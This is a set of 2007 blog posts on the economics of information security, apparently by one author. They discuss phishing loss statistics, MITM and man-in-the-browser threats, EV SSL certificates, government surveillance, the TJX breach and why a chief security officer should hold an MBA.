    U.S. consumers lost $7 billion over the last two years to viruses, spyware, and phishing schemes, according to Consumer Report's latest State of the Net survey. The survey, based on a national sample of 2,000 U.S. households with Internet access, suggests that consumers face a 25% chance of being victimized online, which represents a slight decline from last year.

    Computer virus infections, reported by 38% of respondents, held steady since last year, which Consumer Reports considers to be a positive sign given the increasing sophistication of virus attacks. Thirty-four percent of respondents' computers succumbed to spyware in the past six months. While this represents a slight decline, according to Consumer Reports, the odds of a spyware infection remain 1 in 3 and the odds of suffering serious damage from spyware are 1 in 11.

    Phishing attacks remained flat, duping some 8% of survey respondents at a median cost of $200 per incident. And 650,000 consumers paid for a product or service advertised through spam in the month before the survey, thereby seeding next year's spam crop.

    Perversely, insecurity means money for computer makers: Computer viruses and spyware turn out to be significant drivers of computer sales. According to the study, virus infections drove about 1.8 million households to replace their computers over the past two years. And over the past six months, spyware infestations prompted about 850,000 households replace their computers.

    Posted by iang at 07:36 AM | Comments (0) | TrackBack

    Verisign reminder of what data security really means

    From the 'poignant reminder' department, Verisign lost a laptop with employee data on it.

    The employee, who was not identified, reported to VeriSign and to local police in Sunnyvale, Calif. that she had left her laptop in her car and had parked her car in her garage on Thursday, July 12. When she went out the next morning, she found that her car had been broken into and the laptop had been stolen.

    Possibly a targetted theft?

    The thing is, this can happen to anyone. Including Verisign, or any CA, or any security company. This can happen to you, and probably will, regardless of your policies (which in this case includes no employee data on laptops and using encrypted drives).

    The message to take away from this is not that Verisign is this week's silly sausage, or that their internal security is lax. This can and will happen to anyone. Instead, today's message is that the there is a gap between security offerings and security needs so large that crooks are driving trucks through it every day, and have been for 4 years.

    I estimated a billion dollars in 2004 or so from phishing alone, and now conservative estimates in other post today say it is around 3bn per year. (I say conservative because Lynn posts other numbers that are way higher.) That truck is at least 10 million dollars a day!

    Still not convinced? Consider this mistake that the company made:

    In its employee letter, VeriSign offered a year of free credit monitoring from Equifax for any affected individual, and recommended placing fraud alerts on credit accounts to watch for signs of fraud or identity theft.

    If Verisign can offer a loss-leader zero-margin recovery product to the victims of their own failure, what hope has the rest of the computing industry?

    Posted by iang at 07:23 AM | Comments (0) | TrackBack

    August 05, 2007

    Doom and Gloom spreads, security revisionism suggests "H6.5: Be an adept!"

    The doom and gloom in the security market spreads. This time it is from Richard Bejtlich who probably knows his stuff as well as any (spotted at Gunnar's 1raindrop). After a day at Black Hat, the expensive high-end "shades of illegal" conference in security, he concludes:

    • Existing defenses are absolutely ineffective against current attacks....
    • Detecting current attacks in "real time" is increasingly difficult, if not impossible....
    • The average Web developer and security professional will never be able to counter these attacks....

    Note how he includes the security professional in there. Yup. The problem is that the knowledge space has ballooned and nobody can keep up; Internet security is now a game that is way to broad for anyone to really cover it all.

    Even before the current "war on everyone" you still had several problems with the security industry: lack of understanding of the business, which fed into poor choices being generally too expensive, and a tendency to "best practices:" purchased products because brands deliver CYA as well as high prices, etc etc. Over time, industry discovered they made more money if they didn't hand it over to security ... until 2003 that is, when phishing found its lure.

    If then, you can't find someone to do it for you, you have to do it yourself. This is what I called Hypothesis #6 "It's your job. Do it." But exactly what does that mean?

    #6.5 You need to be an adept in many more aspects

    In all probability you will need to be adept -- well versed if not expert -- in all aspects, right up to user activity. This will stretch you away from the deep cryptographic and protocol tricks that you are used to as you simply won't have time for all that. But an ability to bridge from user needs all the way across to business needs, and then down to crypto bits is probably much more valuable than knowing yet another crypto algorithm in depth.

    The FC7 thesis is that you need to know Rights, Accounting, Governance, Value and Finance as well as Software Engineering and Cryptography. You need to know these things in some depth not to use them but to avoid using them! And, more particularly, avoid their hidden costs, by asking the difficult questions about the costs that nobody else dare recognise.

    Perhaps the best example was the decision by Microsoft to stop coding and start training all their coders in security practices. Not just some of them, all of them!

    Where this leaves the conventional security professional is perhaps an open question. I would prefer to say that instead of prescribing solutions and sometimes supplying them, he would shift to training and guiding. This would involve a different emphasis: if you assess that an IDS might help, in the past you sold an IDS. Now, however, you would assess whether the team leader could cope with an IDS, pointed her in that direction, and mentored the assessment of the tool by the entire team. If they aren't up to that, then you have another problem.

    Posted by iang at 06:51 PM | Comments (1) | TrackBack

    August 04, 2007

    National insecurity - all your packets are belong to US

    A secret court ruled the US Government's wiretapping programme illegal, and the US Government claimed that revealing this fact released confidential activity. So illegality is OK if confidential? No, not before the courts, last I heard, but we'd need a lawyer to explain why the courts will not rely on illegality as a defence, and why we should not?

    In similar news, it was revealed that then-Attorney General, Ashcroft, stated unequivocably that the programme was illegal, from his sickbed. He was immediately replaced with incumbent, Alberto Gonzalez, who some in Congress wonder if his testimony amounts to perjury.

    Other news suggested that what was going on was the desire to start wiretapping (read: real-time direct feed to the NSA) of all the trans-US traffic. FISA, apparently, "requires a warrant to monitor calls intercepted in the United States, regardless of where the calls begin or end." A fair enough metric, 30 years ago.

    Yet, if I call from Britain to Japan, chances are fair that the call is routed through the US, because that's where most of the fibre is. The hub & spoke effect is much more important for the Internet, where a much higher percentage of traffic is routed through the USA. Indeed, pretty much everything Internet-related is spoked around the US hub: Hosting, IP#s, startups, skills, etc.

    Why not tap that, as it doesn't involve the inconvenience of US citizens? A good question, from an intelligence point of view, it's just another Black Chamber operation, updated for the 21st century, and it's easy pickings.

    There are many reasons to oppose this, such as "We just can't suspend the Constitution for six months," but the one I like best is the simplest: if the NSA gets direct feeds of all fibre communications trans-shipping through the US, then two things will happen: Firstly, by laws of economics not Congress, this tapping will eventually include all US-terminated conversations.

    Secondly, it might kick the rest of the world into gear and start responding to the basic threat of aggressive and persistent listening. Perversely, one might suggest that we shouldn't oppose the US, as we need a validated threat to focus our security efforts.

    Indeed, if one surmises that the US government have been told their programmes are illegal, one can question whether the NSA is not already tapping all trans-shipped traffic, and is probably not adequately filtering the locally terminated traffic.

    All your packets are belong to US. You have been warned: Deploy more crypto, guys.

    Posted by iang at 09:41 AM | Comments (3) | TrackBack

    July 29, 2007

    more on firing your MBA-less CSO

    BTW, if you think firing the CSO's boss is harsh, then consider that others do not think so:

    The United Kingdom's information commissioner is calling on chief executives to take the security of customer and staff information more seriously.

    "The roll call of banks, retailers, government departments, public bodies and other organizations which have admitted serious security lapses is frankly horrifying," Richard Thomas wrote in a report. "How can laptops holding details of customer accounts be used away from the office without strong encryption? How can millions of store card transactions fall into the wrong hands?"

    The Information Commissioner's Office (ICO) received almost 24,000 inquiries and complaints concerning personal information, and it prosecuted 16 individuals and organizations in the past 12 months, according to its annual report for 2006 and 2007.

    Another way of thinking of this is to look at these sorts of questions:

    • does security have ROI, and so what?
    • what other part of the business has the same problem with ROI?
    • What is the difference between marketing, sales, and strategy, and which should the CSO be involved in?
    • Should HR use automated psych tests for job interviews for security consultants, and why?
    • Does the security group prefer product placement, endorsement, word-of-mouth, or straight superbowl ... and why?

    Click on if you want some answers. Now, it's not necessary to be able to answer these right off, but you do need to know what they mean.

    Answers:

    • Yes, but it suffers from GIGO -- too hard to predict what the attacker will do to the security product, so not possible to predict the results with any accuracy.
    • advertising.
    • That depends on how robust the security is. If highly robust, then strategy. If not robust, then marketing and sales, to ensure careful disclaimers.
    • No, because they aren't sufficiently accurate, and require feedback the individual to be meaningful. Who you haven't employed as yet. If they are used, it means HR will operate as a filter for diversity and the company will suffer from group think. This will then create security blind spots.
    • Word-of-mouth contributes security advantages, others have little effect on security directly, but will probably work faster in mainstream markets for standard products.

    OK, so all of those are debateable. But that's the point, unless you can debate them on the same turf as your other managers, you're lost. You can't contribute security if you don't understand her area enough to contribute.

    Posted by iang at 03:05 PM | Comments (5) | TrackBack

    July 28, 2007

    Know Your Enemy: Scott McNealy on security theater

    People who don't know about security, but talk about it, are dangers to security. Those who are in the security field can determine the difference between 'security theater' and real security ... but unfortunately those outside are often swayed by simple and easy sales messages.

    Scott McNealy did the privacy world a huge favour by saying "Privacy is dead, get over it." Perhaps he's also doing another favour by issuing a wake-up call to the world:

    McNealy said that to overcome the "efficiency tax" travelers are facing at airports with long lines, it will make sense to begin adopting identity cards that are smart-card-enabled. These can be supplemented by biometric identification such as a thumbprint scanner, all of which can be done more efficiently than "50 security guards."

    ...

    McNealy said it would be better to know who is on a plane or in a mall where a terrorist strikes, adding that it wouldn't be necessary to know who is buying what.
    He said he realizes that his views might be interpreted as a way to sell more hardware and software at Sun. But, "I'm a parent, and I care about my kids," he said.

    McNealy said he envisions the day when parents implant smart chips behind the ears of their children for identification purposes. "My dog has a chip [implant], and it's interesting [that] we treat a dog better than our kids," he said.
    Several attendees said they thought implants seemed extreme or at least something that Americans won't want to consider for years to come. But they all agreed that technology will have to play a bigger role in security, especially at airports.

    After his talk, McNealy met briefly with reporters and was asked if he seriously intended to endorse chip implants. "We are going to move to smart cards and chips ... so we feel safe," he said.

    It sounds more like a DHS press release than anything else. Te detailed problem with all that McNealy says is that we know smartcards and chips do not deliver security (again, see Lynn in comments on rollouts of smartcard systems) but they can dramatically destroy privacy .. which is a reduction of security. Yet, high-profile organisations like Sun and DHS will continue to press security theater as it is good for their growth.

    Posted by iang at 08:04 AM | Comments (6) | TrackBack

    July 24, 2007

    If your CSO lacks an MBA, fire one of you

    Thinking a bit about the theme of security v. management [1,2, 3], here is today's thesis:

    The CSO should have an MBA.

    As a requirement! Necessary (but maybe not sufficient) for the Chief Security Officer job.

    That being a slightly contentious issue, as most of y'all CSOs out there don't have an MBA, the onus is on me now to prove it, or swallow humble pie. Well, this is the blog for being years ahead of the trends, so let's get on with it then.

    Consider some factors.

    1. No understanding. Frequently heard are the brickbats that accuse managers of doing stupid things. See if you can find a non-security guy doing or saying something sensible! It's quite simple for us to state why this happens: non-security people don't understand what the security guys are talking about.
    2. No Voice. It's been grudgingly accepted for some years now that security people are not listened to. In the sense that your chief security dude can rabbit about any threat or any project and get nowhere.
    3. Failure. It is a no-brainer that today's security field is a mess. Windows botnets, Linux attack platforms, spam and phishing, MITBs, unholy virus company alliances... these things run rampant and we can't do much about them. Worse, those that predicted it were ignored, those that sold stuff did well, those that rode the wave from flavour to favour did best. We now have a permanent and industrialised degree of fraud that belongs to the security industry, in place, which Lynn suggests in comments is better than drugs. Oh happy day, full employment for the CSO.

    Maybe, 1 and 2 are opposite sides to the same coin, and spending that coin got us to 3. Which brings us to this point: we can pretty much assume that there is a huge gulf of understanding between the security world and the business world.

    In order to fix all this, we have to generate understanding.

    (Either that, or switch off the systems. Now, the security guys sometimes say exactly that, but the business guys don't listen, so we're back to looking at the real problem.)

    Assume then the basic failure is one of understanding. We can do one of several things: train all the managers in security, train all the security people in business, or put in the middle a liaison who knows both security and business.

    Let's kill the two easy options: Managers by definition know a little of everything, enough to be dangerous, and do not get trained up much in anything except whatever their original skill was. And for your average manager, those days of early skill training are over.

    The second easy option is training the security people. But, that's a hopeless task. Firstly, where they come from, they have little background in business (generally, from IT. Worse is cryptography, better is military, for business exposure at least.). Secondly, it's a full-time job keeping up with just security, let alone learning stuff about business. The reverse difficulty could apply to managers, option 1 above.

    Which leaves option #3: the liaison. Now, we can pretty easily see by process of elimination that the liaison has to be the CSO. So the question reduces to: what does the CSO need to be a successful liaison between security and business?

    He needs the full capability to talk to the managers, and the security people. The latter means he *is* a security person, because by the law of guruism, to gain the respect of the gurus, you have to be one of them. The former means he *is* a manager.

    But we need to go one step further. Because security cuts across all areas of the business in the way that HR, marketing, auditing, customer support does ... and transport, printing, sales, cleaning do not ... then the security honcho needs to understand a lot more of the business areas than the average manager does.

    See the difference? Because security is against an aggressive attacker, because attacks can occur anywhere, the problems are broad and complex, and because the solutions strike across all areas, then .... if our CSO hasn't the skills to talk each manager, at her level, on her turf, not his, then he's lost.

    There are only two ways that I can think of to get the knowledge to be able to talk at the same level as all of the other managers: Either you go fast-track, which means being shoved from department to department, 1-2 years each one, or you can pick it up in a condensed package called an Masters of Business Administration. The former is done, but it takes decades of time in either a very large corporation or the military. Scratch that as an option, as it also means our CSO won't be up to scratch as a security person. Hence, we are left with one option:

    The CSO needs an MBA.

    QED.

    (Which will still cost you minimum one year; full time MBAs are generally 10 to 22 months, part time ones are up to 36 months ... but that's implementation details).

    (Addendum, for scoring easy points against the above logic, Disclosure: I have an MBA :-) ) If you want to read more of the devil's advocacy, try:

    Posted by iang at 11:25 AM | Comments (8) | TrackBack

    July 23, 2007

    Threatwatch: how much to MITM, how quickly, how much lost

    It costs $500 for a kit to launch an MITM phishing attack. (Don't forget to add labour costs at 3rd world rates...)

    David Franklin, vice president for the Europe, Middle East and Africa told IT PRO that these sites are proliferating because they are actually easier for hackers to set up than traditional 'fake' phishing sites because they don't even have to maintain a fake website. He also said man-in-the-middle attacks defeat weak authentication methods including passwords, internet protocol (IP) geolocation, device fingerprinting, cookies and personal security images and tokens, for example.

    "A lot of the attacks you hear about are just the tip of the iceberg. Banks often won't even tell an affected customer that they have been a victim of these man-in-the-middle attacks," said Franklin, adding that kits that guide cybercriminals through setting up a man-in-the-middle attack are now so popular they can be bought for as little as $500 (£250) on the black market now.

    He also said "man-in-the-browser" attacks are emerging to compete in popularity with middleman threat.

    A couple of interesting notes from the above: it is now accepted that MITM is what phishing is (in the form mentioned above, the original email form, and the DNS form). These MITMs defeat the identity protection of SSL secure browsing, a claim made hereabouts first. and one that is still widely misunderstood: This is significant because SSL is engineered to defeat MITMs, but it only defeats internal or protocol MITMs, and can not stop the application itself being MITM'd. This typical "bypass attack" has important economic ramifications, such that SSL is now shown to be too heavy-weight to deliver value, unless it is totally free of cost and setup.

    Secondly, note that the mainstream news has picked up the MITB threat (also reported and documented here first). It's still rare, but in the next 6 months, expect your boss to ask what it's about, because he read it in Yahoo.

    More juicy threat modelling numbers:

    Analysts at RSA Security early last month spotted a single piece of PHP code that installs a phishing site on a compromised server in about two seconds,

    And....

    Despite efforts to quickly shut sites down, phishing sites averaged a 3.8-day life span in May, according to the Anti-Phishing Working Group, which released its latest statistics on Sunday.

    Data from market analyst Gartner released last month showed that phishing attacks have doubled over the last two years.

    Gartner said 3.5 million adults remembered revealing sensitive personal or financial information to a phisher, while 2.3 million said that they had lost money because of phishing. The average loss is US$1,250 per victim, Gartner said.

    In the past (June 2004: 1, 2), I've reported that phishing costs around one billion per year. Multiply those last two numbers above from Gartner, and we get around a billion over the last three years. Still a good rule of thumb then.

    Posted by iang at 06:39 AM | Comments (4) | TrackBack

    June 20, 2007

    SWIFT breach -- class action suit, can we rely on government for privacy of financial data?

    It's been a while since SWIFT was in the news, but they're back! Chris points out that a class action suit has been permitted against them in Federal court:

    In his 20-page opinion, Judge Holderman rejected SWIFT's defense that it acted in good faith by relying on government subpoenas. Any claim to "unfettered government access to the bank records of private citizens" is "constitutionally problematic", the court said.

    In refusing to dismiss the case, Judge Holderman noted reports that "SWIFT officials were aware that their disclosures were legally suspect, but they nevertheless continued to supply database information to the U.S. government."

    This might follow the progress of the illegal wiretapping case before Judge Diggs. There, the state said "state secrets" and the Judge responded "it's not a secret anymore..."

    Which means illegal behaviour can be tried. Why are we so interested? Behaviour that is "probably illegal" and "definately deceptive" behaviour needs to be documented because that might suggest a finding that the US government cannot be expected to secure the privacy of any data. This applies more easily to that of foreigners and their SWIFT data, but customarily, what applies to foreigners soon then applies to locals (laws aside).

    For example, Todd reports that the French are having trouble stopping their parliamentarians from passing their secrets across on Blackberries:

    Members of the new French cabinet have been told to stop using their BlackBerries because of fears that the US could intercept state secrets. The SGDN, which is responsible for national security, has banned the use of the personal data assistants by anyone in the president’s or prime minister’s offices on the basis of “a very real risk of interception” by third parties.

    The ban has been prompted by SGDN concerns that the BlackBerry system is based on servers located in the US and the UK, and that highly sensitive strategic information being passed between French ministers could fall into foreign hands. A confidential study carried out two years ago by Alain Juillet, the civil servant in charge of economic intelligence, found that the BlackBerry posed “a data security problem”.

    Mr Juillet noted that US bankers would prove their bona fides in meetings by first placing their Black­Berries on the table and removing the batteries.

    Some older notes.

    Military intel is now accessing bank accounts of US persons. Now, this falls somewhat in the bucket of "expected" so why comment? Two possible reasons. Firstly, because we have a number:

    Military intelligence officials have used the letters in about 500 investigations over the past five years, while the CIA issues a 'handful' of such letters every year, The Times wrote on its website late Saturday. Civil rights experts and defence lawyers were critical of the practice.

    In comparison, the domestic law enforcement agency, the Federal Bureau of Investigation (FBI), makes much more frequent use of the letters to get financial information, and served about 9,000 such letters in 2005 alone, said justice officials.

    ( old dead link.) With numbers, we can calculate risk scenarios for financial cryptography applications. (It might be more interesting to some for example to look at total Internet intercepts; but we could hazard a guess that this is the same order of magnitude.)

    The Times cited two examples where the military used the letters - one was a government contractor with unexpected wealth, another was a Muslim chaplain at Guantanamo Bay prison for terrorist suspects.

    Secondly, because of the above privacy question. Concentrate on the first case: this is a clear suggestion of fraud. That's a regular crime. There are courts, judges, prosecutors, defence attorneys, and PIs lined up from coast to coast in the US for that sort of thing. So why did the military bypass normal chains of investigation and prosecution, and use the nuclear option?

    Because it could. There is no climate of fear of prosecution for overstepping the bounds. There is no particular climate that tools should be limited in use. This would support a finding that data will be misused.

    Caveat: we probably need to verify those statements before getting too confident.

    Posted by iang at 05:29 AM | Comments (1) | TrackBack

    May 23, 2007

    PKI moving to adopt the plugin model -- realignment to security based on user-needs?

    One of the things that occurred in the early days of phishing was the realisation that the browser (and its manufacturer) was ill-suited to dealing with the threat, even though it was the primary security agent (c.f., from the SSL promise to defeat the MITM). One solution I pushed a lot was plugin security -- adding the authentication or authorisation logic into plugins so that different techniques could experiment and evolve.

    In hindsight, this will appear obvious. 99% of the client-side security work involved plugins -- Trustbar, Netcraft, Petname, Ping's design, and many others. But it required a mindshift from "this is a demo" to "this is where it should be." This became poignant in the discussions of what to do about EV -- if Mozilla adopted EV into the browser, that opened a huge can of worms. Hence, putting EV in the plugin was the logical conclusion.

    Now it seems to have happened:

    Verisign Inc. has [...snip] released a Firefox plugin that will show the same type of green address bar that is displayed by Internet Explorer 7 when it lands on certain highly trusted Web sites that use Extended Validation Secure Sockets Layer (EV SSL) certificates.

    Before companies like Verisign will issue an EV SSL certificate, they take extra steps to make sure that it is going to a legitimate organization. For example, they will make sure that the business in question is registered with local authorities, has a real address, and actually has control over the Web domain in question.

    Earlier, I suggested that understanding EV in terms of security is futile. More, look to structural issues:

    Verisign's Tim Callan says that more than 500 Web sites, including sites run by eBay's PayPal division and ING Group, have now completed EV SSL certification. Nearly 90 percent of them are certified by Verisign, said Callan, a director of product marketing with the company's SSL group.

    That was the plan. Consider how much value there is in the other CAs scrabbling around the crumbs of 10% of the market, versus the costs of the EV programme. Even more to the point:

    That's an important point because Verisign's Firefox plugin doesn't identify sites that are certified by its competitors. Callan said it would have been too much work to maintain a list of legitimate EV SSL providers. "At that point, we're creating a whole new simultaneous real-time checking system," he said. "We were willing to invest in this one-off code development, but we didn't want to inherit this legacy of constantly maintaining this service, especially because this is a stop-gap measure. At the end of the year, this will be built into Firefox proper."

    Can you say barriers to entry ? Once a site has been EV'd by Verisign, it is unlikely to shift, and that's what they wanted. If that doesn't work, ask Callan to say OCSP, which is written large into the EV draft (!) specification ...

    Leaving aside the industry structural games, let's get back to PKI. There is a silver lining: EV means that it now becomes Verisign's responsibility to authenticate these sites to the user.

    The *only* way to do that is in a way that is clearly expressed as "by Verisign" and the plugin makes this clear. If the browser takes on that responsibility, it breaks the statement, and therein lies the future breach of EV and the past failure of the security model.

    Since long ago, we have hammered on one of the failures of the SSL server certificate market: "all CAs are alike." They were not, are not, and cannot be, and why the developers hung on to this blatantly and obviously false myth was mystifying to me.

    Verisign has now broken it, and broken it good. For that we should all be thankful, and in time, we will see a differentiated CA market, which allows new products and new security postures to meet the divergent needs of users.

    Posted by iang at 10:13 AM | Comments (4) | TrackBack

    May 22, 2007

    No such thing as provable security?

    I have a lot of skepticism about the notion of provable security.

    To some extent this is just efficient hubris -- I can't do it so it can't be any good. Call it chutzpah, if you like, but there's slightly more relevance to that than egotism, as, if I can't do it, it generally signals that businesses will have a lot of trouble dealing with it. Not because there aren't enough people better than me, but because, if those that can do it cannot explain it to me, then they haven't got much of a chance in explaining it to the average business.

    Added to that, there have been a steady stream of "proofs" that have been broken, and "proven systems" that have been bypassed. If you look at it from a scientific investigative point of view, generally, the proof only works because the assumptions are so constrained that they eventually leave the realm of reality, and that's particularly dangerous to do in security work.

    Added to all that: The ACM is awarding its Godel prize for a proof that there is no proof:

    In a paper titled "Natural Proofs" originally presented at the 1994 ACM STOC, the authors found that a wide class of proof techniques cannot be used to resolve this challenge unless widely held conventions are violated. These conventions involve well-defined instructions for accomplishing a task that rely on generating a sequence of numbers (known as pseudo-random number generators). The authors' findings apply to computational problems used in cryptography, authentication, and access control. They show that other proof techniques need to be applied to address this basic, unresolved challenge.

    The findings of Razborov and Rudich, published in a journal paper entitled "Natural Proofs" in the Journal of Computer and System Sciences in 1997, address a problem that is widely considered the most important question in computing theory. It has been designated as one of seven Prize Problems by the Clay Mathematics Institute of Cambridge, Mass., which has allocated $1 million for solving each problem. It asks - if it is easy to check that a solution to a problem is correct, is it also easy to solve the problem? This problem is posed to determine whether questions exist whose answer can be quickly checked, but which require an impossibly long time to solve.

    The paper proves that there is no so-called "Natural Proof" that certain computational problems often used in cryptography are hard to solve. Such cryptographic methods are critical to electronic commerce, and though these methods are widely thought to be unbreakable, the findings imply that there are no Natural Proofs for their security.

    If so, this can count as a plus point for risk management, and a minus point for the school of no-risk security. However hard you try, any system you put in place will have some chances of falling flat on its face. Deal with it; the savvy financial cryptographer puts in place a strong system, then moves on to addressing what happens when it breaks.

    The "Natural Proofs" result certainly matches my skepticism, but I guess we'll have to wait for the serious mathematicians to prove that it isn't so ... perhaps by proving that it is not possible to prove that there is no proof?

    Posted by iang at 08:21 AM | Comments (3) | TrackBack

    May 18, 2007

    Is this Risk Management's Waterloo?

    So why can't we do it? In short, we do know that all security is really about risk management. So we just do risk management, right?

    Igor says we can do it, in comments. Chandler says it is hard. He lists a dozen or so reasons why.

    To which I'll add one: the attacker is aggressive. Whatever we measure, the attacker actively perverts. So, unlike insurance models, security doesn't work well with just statistics. Much as we say we need more data, if we had all the data in the world, and fixed what we could see, the attacker would simply move faster than we could.

    A trio of notes:

    • Note that this isn't to say that he is the uber-attacker, the Superman recently much discussed. He's just us, on the other side. Or, better yet, pick the middling competent programmer down the hall. We fix the bugs, why can't they? The point being to stop thinking about the bipolar choice of attacker as dense as mould, or as smart as Moriarty.
    • Another thing that Lynn has pointed out is that the attacker can outspend the defender, sometimes as much as by 100:1. Indeed, recently, the USG agencies were reported to receive $10m in funding ... for an attacker that is causing losses of more than a billion per year.
    • On the question of "more data," a meme that is somewhat current: the paper that Igor mentioned pointed to http://phishtank.com/ which is some sort of volunteer group to validate URLs, and provide data. They are the same people as http://openDNS.com/ which provide DNS with a phishing filter. Nice twist, but note the perversion.

    So, there are some issues here. Are there limits to the risk management approach, beyond the fact that it seems to be beyond the capabilities of the industry? Has it reached its Waterloo, against the active, mildly competent attacker with 100 times the spend?

    Posted by iang at 07:46 AM | Comments (5) | TrackBack

    May 17, 2007

    The Myth of the Superuser, and other frauds by the security community

    The meme is starting to spread. It seems that the realisation that the security community is built on self-serving myths leading to systemic fraud has now entered the consciousness of the mainstream world.

    Over on the Volokh Conspiracy, Paul Ohm, exposes the Myth of the Superuser. His view is that too often, the sense of the Superuser is one of an overpowering ability of this uber-attacker. Once this sense enters the security agenda, the belief that there is this all-powerful evil criminal mastermind out there, watching and waiting, leads us into dangerous territory.

    Ohm does not make the case that they do not exist, but that their effect or importance is greatly exaggerated. I agree, and this is exactly the case I made for MITM. In brief, the Man-in-the-middle is claimed to be out there lurking, and we must protect, at any costs. Wrong on all counts, and the result is a security disaster called phishing, which in itself is an MITM.

    Then, phishing can be interpreted as a result of our obsession with Ohm's Superuser, the uber-attacker. In part, at least, and I'd settle for running the experiment without the uber-obsession. Specifically, Ohm points at some bad results he has identified:

    Very briefly, in addition to these two harms — overbroad laws and civil liberties infringements — the other four harms I identify are guilt by association (think Ed Felten); wasted investigative resources (Superusers are expensive to catch); wasted economic resources (how much money is spent each year on computer security, and is it all justified?); and flawed scholarship (See my comment from yesterday about DRM).

    All of which we can see, and probably agree on. What makes this essay stand out is that he goes the extra mile and examines what the root causes might be:

    I have essentially been saying that we (policymakers, lawyers, law professors, computer security experts) do a lousy job calculating the risks posed by Superusers. This sounds a lot like what is said elsewhere, for example involving the risks of global warming, the safety of nuclear power plants, or the dangers of genetically modified foods. But there is a significant, important difference: researchers who study these other risks rigorously analyze data. In fact, their focus on numbers and probabilities and the average person’s seeming disregard for statistics is a central mystery pursued by many legal scholars who study risk, such as Cass Sunstein in his book, Laws of Fear.

    In stark contrast, experts in the field of computer crime and computer security are seemingly uninterested in probabilities. Computer experts rarely assess a risk of online harm as anything but, “significant,” and they almost never compare different categories of harm for relative risk. Why do these experts seem so willing to abdicate the important risk-calculating role played by their counterparts in other fields?

    Does that sound familiar? To slide into personal anecdote, consider the phishing debate (the real one back in 2004 or so, not the current phony one).

    When I was convinced that we had a real problem, and people were ignoring it, I reasoned that the lack of scientific approach was what was holding people back from accepting the evidence. So I started collecting numbers on costs, breaches, and so forth (you'll see frequent posts on the blog, also mail postings around). I started pushing these numbers out there so that we had some grounding in what we were talking about.

    What happened? Nothing. Nobody cared. I was able around 2004 to state that phishing already cost the USA about a billion dollars a year, and sometime shortly after that, that basically all data was compromised. In fact, I'm not even sure when we passed these points, because ... it's not worth my trouble to even go back and identify it!

    Worse than nobody caring, the security field simply does not have the conceptual tools to deal with this. A little bit like "everyone was in denial" but worse, there is a collective glazed view to the whole problem.

    What's going on? Ohm identifies 4 explanations (in point form here, but read his larger descriptions):

    1. Pervasive secrecy...
    2. Everyone is an Expert...
    3. Self-Interest...
    4. The Need for Interdisciplinary Work...

    No complaint there! Readers will recognise those frequent themes, and we could probably collectively get it to a list of 10 explanations without too much mental sweat.

    But I would go further. Deeper. Harsher.

    I would suggest that there is one underlying cause, and it is structural. It is because security is a market for silver bullets, in the deep and economic sense explained in that long paper. All of the above arise, in varying degrees, in the market first postulated by Michael Spence.

    The problem with this is that it forces us to face truths that few can deal with. It asks us to choose between the awful grimness of helplessness, and the temptation to the dark side of security fraud, before we can enter any semblance of a professional existance. Nobody wants to go there.

    Posted by iang at 08:21 AM | Comments (7) | TrackBack

    May 08, 2007

    Threatwatch: Still searching for the economic MITM

    One of the things we know is that MITMs (man-in-the-middle attacks) are possible, but almost never seen in the wild. Phishing is a huge exception, of course. Another fertile area is wireless lans, especially around coffee shops. Correctly, people have pointed to this point as a likely area where MITMs would break out.

    Incorrectly, people have typically confused possibility with action. Here's the latest "almost evidence" of MITMs, breathtakingly revealed by the BBC:

    In a chatroom used to discuss the technique, also known as a 'man in the middle' attack, Times Online saw information changing hands about how security at wi-fi hotspots – of which there are now more than 10,000 in the UK – can be bypassed.

    During one exchange in a forum entitled 'T-Mobile or Starbucks hotspot', a user named aarona567 asks: "will a man in the middle type attack prove effective? Any input/suggestions greatly appreciated?"

    "It's easy," a poster called 'itseme' replies, before giving details about how the fake network should be set up. "Works very well," he continues. "The only problem is,that its very slow ~3-4 Kb/s...."

    Another participant, called 'baalpeteor', says: "I am now able to tunnel my way around public hotspot logins...It works GREAT. The dns method now seems to work pass starbucks login."

    Now, the last paragraph is something else, it is referring to the ability to tunnel through DNS to get uncontrolled access to the net. This is typically possible if you run your own DNS server and install some patches and stuff. This is useful, and economically sensible for anyone to do, although technically it may be infringing behaviour to gain access to the net from someone else's infrastructure (laws and attitudes varying...).

    So where's the evidence of the MITM? Guys talking about something isn't the same as doing it (and the penultimate paragraph seems to be talking about DNS tunnelling as well). People have been demoing this sort of stuff at conferences for decades ... we know it is possible. What we also know is that it is not a good use of your valuable time as a crim. People who do this sort of thing for a living search for techniqes that give low visibility, and high gathering capability. Broadcasting in order to steal a single username and password fails on both counts.

    If we were scientists, or risk-based security scholars, what we need is evidence that they did the MITM *and* they committed a theft in so doing it. Only then can we know enough to allocate the resources to solving the problem.

    To wrap up, here is some *credible* news that indicates how to economically attack users:

    Pump and dump fraudsters targeting hotels and Internet cafes, says FBI Cyber crooks are installing key-logging malware on public computers located in hotels and Internet cafes in order to steal log-in details that are used to hack into and hijack online brokerage accounts to conduct pump and dump scams.

    The US Federal Bureau of Investigation (FBI) has found that online fraudsters are targeting unsuspecting hotel guests and users of Internet cafes.

    When investors use the public computers to check portfolios or make a trade, fraudsters are able to capture usernames and passwords. Funds are then looted from the brokerage accounts and used to drive up the prices of stocks the frudsters had bought earlier. The stock is then sold at a profit.

    In an interview with Bloomberg reporters, Shawn Henry, deputy assistant director of the FBI's cyber division, said people wouldn't think twice about using a computer in an Internet cafe or business centre in a hotel, but he warns investors not to use computers they don't know are secure.

    Why is this credible, and the other one not? Because the crim is not sitting there with his equipment -- he's using the public computer to do all the dangerous work.

    Posted by iang at 02:18 PM | Comments (1) | TrackBack

    May 07, 2007

    WSJ: Soft evidence on a crypto-related breach

    Unconfirmed claims are being made on WSJ that the hackers in the TJX case did the following:

    1. sat in a carpark and listened into a store's wireless net.
    2. cracked the WEP encryption.
    3. scarfed up user names and passwords ....
    4. used that to then access centralised databases to download the CC info.
    The TJX hackers did leave some electronic footprints that show most of their break-ins were done during peak sales periods to capture lots of data, according to investigators. They first tapped into data transmitted by hand-held equipment that stores use to communicate price markdowns and to manage inventory. "It was as easy as breaking into a house through a side window that was wide open," according to one person familiar with TJX's internal probe. The devices communicate with computers in store cash registers as well as routers that transmit certain housekeeping data.

    After they used that data to crack the encryption code the hackers digitally eavesdropped on employees logging into TJX's central database in Framingham and stole one or more user names and passwords, investigators believe. With that information, they set up their own accounts in the TJX system and collected transaction data including credit-card numbers into about 100 large files for their own access. They were able to go into the TJX system remotely from any computer on the Internet, probers say.

    OK. So assuming this is all true (and no evidence has been revealed other than the identity of the store where it happened), what can we say? Lots, and it is all unpopular. Here's a scattered list of things, with some semblance of connectivity:

